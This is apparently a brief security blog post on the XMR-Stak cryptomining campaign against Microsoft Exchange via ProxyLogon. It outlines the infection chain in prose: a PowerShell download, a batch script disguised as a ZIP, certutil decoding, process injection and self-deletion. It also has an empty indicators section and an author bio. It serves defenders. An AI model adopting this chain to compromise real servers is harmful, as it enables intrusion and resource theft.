Discovered in March 2021, XMR-Stak is a cryptomining trojan that targets vulnerable Microsoft Exchange Server systems with a ProxyLogon exploit. Compromised email systems are used to both mine new currency and as payload hosting servers for new infections.
XMR-Stak is described as been a universal Stratum pool miner. The miner supports CPUs, AMD and NVIDIA GPUs and can be used to mine the crypto currencies Monero, Aeon and many more Cryptonight coins.
Vulnerable Microsoft Exchange servers are initially accessed using a PowerShell command to download a ZIP archive file from a previously compromised server’s Outlook Web Access path. This file is not a legitimate archive but is instead a batch script, which when executed invokes certutil.exe to download and decode two additional spoofed ZIP archives.
The first of these files is another batch script which will decode second file, which contains the miner and it’s configuration data, before injecting it into a running process. If successful, the script then deletes both itself and the other ZIP archives, leaving only the running mining process.
XMR-Stak configuration data states that it will only begin mining if it can create a TLS connection to the attacker’s Monero wallet.
If your unsure what Cryptocurrency is and how it works, then we suggest you read up , there is lots of good books out there for example Cryptocurrency Investing For Dummies or Bitcoin For Dummies, we have found that that “for dummies” range of books offers a great start to any subject area that your unsure about.
Indicators of compromise
Duncan is a technology professional with over 20 years experience of working in various IT roles. He has a interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.